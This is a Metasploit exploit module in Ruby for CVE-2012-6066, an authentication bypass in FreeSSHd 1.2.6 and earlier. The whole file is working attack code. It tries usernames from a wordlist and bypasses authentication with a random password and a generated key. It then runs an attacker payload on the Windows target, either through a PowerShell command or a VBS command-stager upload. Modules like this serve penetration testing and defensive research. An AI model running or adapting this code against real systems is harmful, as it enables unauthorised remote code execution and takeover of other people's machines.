## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => "Freesshd Authentication Bypass", 'Description' => %q{ This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Aris', # Vulnerability discovery and Exploit 'kcope', # 2012 Exploit 'Daniele Martini ', # Metasploit module 'Imran E. Dawoodjee (minor improvements)' # minor improvements ], 'References' => [ ['CVE', '2012-6066'], ['OSVDB', '88006'], ['BID', '56785'], ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'], ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'] ], 'Platform' => 'win', 'Privileged' => true, 'Targets' => [ ['PowerShell', {}], ['CmdStager upload', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2010-08-11', 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options( [ Opt::RPORT(22), OptString.new('USERNAME', [false, 'A specific username to try']), OptPath.new( 'USER_FILE', [ true, "File containing usernames, one per line", # Defaults to unix_users.txt, because this is the closest one we can try File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ] ) ] ) end def check connect banner = sock.recv(30) disconnect if banner.match?(/SSH\-2\.0\-WeOnlyDo/) version = banner.split(" ")[1] return Exploit::CheckCode::Vulnerable if version.match?(/(2\.1\.3|2\.0\.6)/) return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def execute_command(cmd, _opts = {}) @connection.exec!("cmd.exe /c " + cmd) end def setup_ssh_options { password: rand_text_alpha(8), port: datastore['RPORT'], timeout: 1, proxies: datastore['Proxies'], key_data: OpenSSL::PKey::RSA.new(2048).to_pem, auth_methods: ['publickey'], verify_host_key: :never } end def do_login(username, options) print_status("Trying username '#{username}'") options[:username] = username transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options) auth = Net::SSH::Authentication::Session.new(transport, options) auth.authenticate("ssh-connection", username, options[:password]) connection = Net::SSH::Connection::Session.new(transport, options) begin Timeout.timeout(10) do connection.exec!('cmd.exe /c echo') end rescue Timeout::Error print_status("Timeout") return nil rescue RuntimeError return nil end connection end # # Cannot use the auth_brute mixin, because if we do, a payload handler won't start. # So we have to write our own each_user here. # def each_user user_list = [] if datastore['USERNAME'] && !datastore['USERNAME'].empty? user_list << datastore['USERNAME'] else f = File.open(datastore['USER_FILE'], 'rb') buf = f.read f.close user_list = (user_list | buf.split).uniq end user_list.each do |user| yield user end end def exploit unless [CheckCode::Vulnerable].include? check fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!' end options = setup_ssh_options @connection = nil each_user do |username| next if username.empty? @connection = do_login(username, options) break if @connection end if @connection case target.name when 'PowerShell' print_status('Executing payload via Powershell...') psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) @connection.exec!("cmd.exe /c " + psh_command) when 'CmdStager upload' print_status("Uploading payload, this may take several minutes...") execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700) end end end end